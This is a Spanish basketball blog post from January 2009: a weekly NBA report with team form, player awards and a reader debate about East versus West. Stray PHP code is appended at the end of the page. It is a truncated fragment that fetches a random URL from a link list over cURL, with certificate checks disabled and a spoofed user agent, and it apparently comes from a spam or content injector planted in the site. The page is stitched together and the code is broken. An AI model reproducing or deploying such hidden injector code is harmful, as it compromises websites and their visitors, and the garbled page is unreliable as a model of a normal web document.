Informe Semanal TJNBA (Semana 11)

12 de January de 2009 por MagicJohnson32

Por Txusma y MagicJohnson32

Aparecen grandes sorpresas en nuestro informe semanal y es que habrá equipos que no estarán acostumbrados a verse tan arriba o tan abajo. Mirémoslo con detalle:

ON FIRE:

4 victorias han logrado unos Magic que han dejado claro que son candidatos a todo. Sus 2 triunfos frente a Atlanta y sobre todo la sólida victoria frente a San Antonio nos dejan frente a un equipo con el que hay que contar siempre. Imbatidos también Cleveland, Portland, Utah (y eso que siguen sin Boozer) y 2 gratas sorpresas: Philadelphia y Minnesota. Lo de los Sixers escama y mucho: Sin Brand pero con un Iguodala y un Andre Miller jugando sus mejores partidos de la temporada, los Sixers se quedan a un paso de entrar en los Playoffs del Este. Y en Minnesota se frotan los ojos al ver a su equipo ganar los 3 partidos de la semana y los últimos 5 aunque es bien cierto que no se han enfrentado a ninguno de los grandes. En todo caso, chapó para Jefferson, Foye y compañía.

AL TRAN-TRAN:

Los Lakers son el mejor equipo de la NBA y esta semana tan solo han perdido su partido con unos irregulares Hornets, capaces de asaltar el Staples un día y ser apalizados al siguiente en Utah.

Buenas semanas para los Spurs (que, a lo tonto a lo tonto, ya están segundos en el Oeste empatados con los Hornets y haciendo buena la tradición del año impar), los Rockets, que a pesar de las bajas han sumado importantes victorias (por ejemplo frente a Boston), los Suns, que disponen de un Shaq en un gran momento de forma, los Nets, que aunque nadie les da plaza de Playoffs ahí siguen a pesar de la baja de Harris, y los Nuggets, que tan solo mordieron el polvo frente a los Pistons de Iverson.

Los Bulls tan solo han perdido un partido esta semana pero fue en una dura derrota contra el peor equipo de la liga: los Oklahoma City Thunder, con lo que desperdiciaron una gran ocasión de acabar imbatidos la semana. Precisamente, a los Thunder parecen haberle sentado muy bien el fichaje de Nenad Krstic, visto el par de partidos ganados esta semana, y ya están cerquita de los Wizards en la lucha por evitar el farolillo rojo. El resto de aspirantes a las últimas plazas de Playoffs en el Este, Raptors y Bucks, ganaron las mitad de sus partidos, pero tengamos en cuenta que Toronto ha jugado esta semana sin Calderón ni Jermaine. Los Bucks continúan mostrándose sólidos a partir de una buena defensa y un Redd renacido. Otro equipo que ha ganado la mitad de sus partidos han sido los Mavs, donde se ha lesionado de nuevo Josh Howard y que perdió ayer sorprendentemente frente a los Kings. Cuidadito que actualmente están fuera de Playoffs.

AL BORDE DEL ABISMO:

Resulta increíble encontrar a los Celtics a estas alturas del Informe Semanal pero es que su semana ha sido horrenda y maquillada tan solo con una victoria frente a unos débiles Raptors. Teníamos claro que tenían que bajar el listón pero a lo mejor se han pasado un poco de frenada ¿no?. Los Pistons han ganado tan solo su partido con morbo de la semana, el que les enfrentaba a los Nuggets de Billups. El resto, muy, muy flojitos, aunque en su defensa hay que decir que arrastran las bajas de Wallace y Hamilton. Miami por su parte, haría bien en no despistarse mucho porque se pueden acabar metiéndose de lleno en la lucha por los Playoffs. A pesar de un sideral Wade y las primeras buenas actuaciones de Beasley, los Hets han perdido 3 de sus 4 encuentros de la semana.

Bobcats, Warriors, Pacers y Kings también han ganado un solo partido y escapan, por poquito, del pozo. Por cierto, Monta Ellis puede volver a finales de mes.

EL POZO:

Pozo en el que se hunden los Wizards, a los que ya está claro que no salvará ni Arenas, y los Clippers, que como comentamos hace algunos días tienen la lista de inactivos con más talento de la liga: Baron Davis, Zach Randolph y Chris Kaman. Las cosas ya no funcionaban antes pero así no se puede. Knicks y Grizzlies también se ven abocados esta semana a la parte baja del informe, pero la sorpresa es ver por estos lares a los Hawks, que tan buenas sensaciones han ido destilando esta temporada. Y es que está claro que a nadie le sienta bien jugar 2 partidos seguidos contra Dwight Howard y sus amigos. Ahora además no podrán contar con Al Horford unos cuantos partidos.

PREMIOS SEMANALES

MVP: Haremos una excepción y entregaremos el premio a Danny Granger pese a las tres derrotas encajadas en los cuatro partidos que Indiana ha disputado la última semana. Los Pacers aspiraban a poco más que a sacar algún triunfo en esta gira por el Oeste y si lo consiguieron fue gracias a Granger, autor de un triple sobre la bocina para derrotar a los Suns y que ha promediado en estos partidos casi 36 puntos, 5 rebotes, 4 asistencias, 2 robos y 1 tapón. Estas cifras le valen para superar a los grandes de la liga que también han brillado esta semana, como Wade (31 puntos, 8 asistencias, 4.3 rebotes, 2.5 robos), LeBron (29.5 puntos, 5.5 rebotes, 5 asistencias, 3 robos), Kobe (29 puntos, 8 asistencias, 4.5 rebotes) o Carter (25.7 puntos, 11 asistencias, 8 rebotes).

El rookie: Hay que mencionar a los habituales Mayo (19 puntos, 5 rebotes y 3.3 asistencias) y Gordon (20.5 puntos y 5 asistencias). También a Beasley, que ha jugado a buen nivel y ha promediado 18.3 puntos y 7.5 rebotes. Pero el premio es para Westbrook, que ha promediado 16.8 puntos, 7.8 asistencias y 6.3 rebotes.

La sorpresa: A Andrea Bargnani le ha sentado de maravilla la baja de Jermaine O’Neal y ha firmado la mejor semana que le recordamos. 21 puntos, 8 rebotes ante los Bucks; 25 puntos, 4 rebotes, 2 tapones ante los Wizards; 21 puntos, 8 rebotes, 2 tapones contra los Grizzlies; y 17 puntos, 9 rebotes contra los Celtics. Tal vez sea el momento de vender a buen precio… o el de apostar por el italiano y traspasar a O’Neal. Aunque la verdadera sorpresa de la semana han sido Mardy Collins y sus 16 puntos, 5 asistencias, 4.5 puntos y 2 recuperaciones de media.

La decepción: Gerald Wallace ha protagonizado una semana de lo más rara. La abrió con una buena actuación en la sonada victoria sobre los Celtics y la continuó con tres partidos muy flojos, incluyendo sus 0 puntos y banquillazo durante la segunda parte ante los Wizards. Larry Brown le acusó de falta de intensidad. Y si a Wallace le falta intensidad ¿qué le queda?

El mayor esfuerzo en vano: David Lee es un reloj. Acumula 27 partidos seguidos anotando al menos 10 puntos, y 8 partidos atrapando más de 10 rebotes. Esta semana, pese a que los Knicks han perdido sus tres encuentros, no ha fallado a su cita con el doble-doble.

CONCLUSIONES

– Desde ayer tenemos a tres equipos con 30 victorias: Magic, Celtics y Lakers. El martes se unirá al grupo Cleveland, una vez que gane a los Grizzlies, cosa que sin duda sucederá. Los siguientes equipos en las clasificaciones son los Spurs, con 24-12, y Nuggets, con 25-13. La brecha, pese a que queda un mundo, empieza a parecer insalvable.

– Es un tema recurrente en nuestros análisis: lo de Orlando va en serio. Por si quedaba alguna duda, ahí están sus dos triunfos seguidos sobre los Hawks y su victoria, anoche, en San Antonio.

– Otra cosa que ya empezábamos a tener claro y que se confirma aún más con cada partido que juega es que Danny Granger pertenece a la elite de la liga. Sus 26 puntos por partido lo colocan 4º en la clasificación de anotadores, sólo por detrás de Wade, James y Bryant. Ha logrado 20 o más puntos en todos los partido que ha jugado esta temporada salvo en cuatro de ellos. All-Star sí o sí.

– Y una última sospecha que va adquiriendo forma: los Sixers juegan mejor sin Brand. Llevan cuatro victorias seguidas, algo que no habían logrado en toda la temporada, con Iguodala y Miller a su mejor nivel. El diagnóstico parece claro: los Sixers necesitan correr, algo para lo que Brand (aún) no estaba preparado.

– Como era previsible, Darius Miles ha firmado un nuevo contrato (con los Grizzlies una vez más) y todo apunta a que los Blazers tendrán que asumir la carga salarial correspondiente a los dos años restantes del contrato que en su día le firmaron, un total de 18 millones de dólares. Lo cierto es que se lo tienen merecido.

lebronkobe– Los Lakers vienen de lograr tres sufridas victorias ante Warriors, Pacers y Heat. Las bajas están pasando factura pero aún así los angelinos siguen ganando. Sin embargo, el calendario inmediato que les espera para los próximos 7 días es para asustarse: visitarán el martes a los Rockets y el miércoles a los Spurs, y recibirán el viernes a los Magic y el lunes a los Cavaliers. Contamos las horas esperando el Kobe vs LeBron.

– Y en nuestro capítulo semanal de “Qué dura es la vida en el Oeste”, los nueve primeros clasificados de dicha conferencia mantienen una progresión en torno o ampliamente por encima de las 50 victorias al final de la regular season.

La pregunta de la semana: ¿Están los Magic a la altura de Cavs y Celtics?

Comenta

8 comentarios a esta entrada

  1. Jabho dice:
    #1

    Lo de “Que dura es la vida en el Oeste” ahora es leyenda urbana o pura inercia de tiempos pasados. En partidos inter conferencias gana claramente el Este y los mejores equipos de la liga estás bastante equilibrados entre conferencias, candidatos al título igual número en ambos. Los 6 equipos que no mencionas del Oeste llevan una progresión de menos de 25 victorias y sólo un equipo del Este lleva una progresión similar. El título debería ser ahora mismo “Que fácil es sumar 50 victorias en el Oeste”

    Si a Gerald Wallace le quitas la intensidad le queda el contrato de 50$ por 5 añitos… no está tan mal 🙂

      Citar

  2. MagicJohnson32 dice:
    #2

    Bah. En el Este hay 4 equipos que estarían en los Playoffs del Oeste.

    Y dirás lo que quieras, pero tener que ganar 55 partidos para asegurarte los Playoffs es una pasada.

      Citar

  3. Txusma dice:
    #3

    No creo que sea todo tan facil, mordaunt. A lo mejor si metes en el Oeste a Milwaukee, New Jersey, Philadelphia, etc… estarian con 11 victorias ahora y Minnessota en el Este a lo mejor llevaba 16.
    Pero sin tener en cuenta el numero de victorias-derrotas de los equipos parecen un hecho que los equipos de la conferencia Oeste son, en conjunto mas potentes. En el Oeste hay 9 equipos de gran calidad y en el Este diria q 4 o 5.

      Citar

  4. Jabho dice:
    #4

    El dato mas objetivo es el número de partidos interconferencias y ahí ahora mismo gana el Este. Este es un dato objetivo y que en el Oeste hay 9 equipos de gran calidad y en el Este 4 o 5 es mas subjetivo.

    Exáctamente ¿en que os apoyáis para decir que es mas duro el Oeste? Sinceramente diría que ahora no lo es. Los 3 mejores de cada conferencia estan equilibrados, los 5 o 6 siguientes son algo mejores en el Oeste y los 6 peores son muchísimo peores los del Oeste.

    Lo dicho, lo del wild, wild, west no lo veo ahora mismo.

      Citar

  5. Txusma dice:
    #5

    Donde consultas ese dato, Mordaunt?

    Tu mismo estas dando la razon: si los 3 mejores de la Conferencia estan equilibrados y los 5 o 6 siguientes son mejores en el Oeste, en q conferencia es mas duro clasificarse para Playoffs? Dallas si quiere clasificarse tiene q ganar a los 8 equipos q tiene por encima y cualquiera de estos equipos esta como minimo a la altura del 4 del Este q ahora mismo es Detroit…

      Citar

  6. MagicJohnson32 dice:
    #6

    Nos apoyamos en que en el Oeste hay 9 equipazos, cosa que automáticamente hace que la conferencia sea mucho más dura que el Este. Y además, llegas a primera ronda tras quedar primero o segundo y te encuentras con los Suns, o los Jazz, o los Mavs, o a los Rockets…

      Citar

  7. Jabho dice:
    #7

    Txus, la página de clasificaciones NBA te dice el balance total y el que tienes contra tu conferencia. El que tienes contra la otra conferencia sale restando y luego puedes sumar los partidos que ganan los equipos de una conferencia contra los de la otra. Tus Bulls por ejemplo llevan un balance de 8-14 dentro de la conferencia Este y 8-8 contra la conferencia Oeste.

    Si haces los calculos verás que el Este lleva mas partidos ganados que el Oeste

    Yo no veo 9 equipazos en el Oeste. Los balances y los equipos los veo igualados mas o menos hasta el puesto 5 de cada conferencia. Luego es cierto que los 4 siguientes del Oeste son mejores que los 4 siguientes del Este, pero ojo que de los 7 últimos de la liga, 6 son del Oeste. Dallas, Rockets, Blazers y los actuales Jazz son mejores que Heat, Nets y similares, pero no son equipazos para mi….

    Tal y como está el tema no es tan significativo las 50 victorias y al medir la conferencia tienes que medirlo todo. Si los 5 mejores están equilibrados, los 4 siguientes son mejores y los 6 últimos peores no sé, no lo veo.

      Citar

  8. Txusma dice:
    #8

    Estoy de acuerdo en q es mas facil sumar 50 victorias en el Oeste que en el Este mas que nada pq en el Oeste estan, posiblemente, los equipos mas flojos de la liga exceptuando Washington. Por ese mismo motivo salen mas victorias del Este frente al Oeste. Lo q creo q si es objetivo es q es mas dificil clasificarse para los Playoffs en el Oeste que en el Este no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>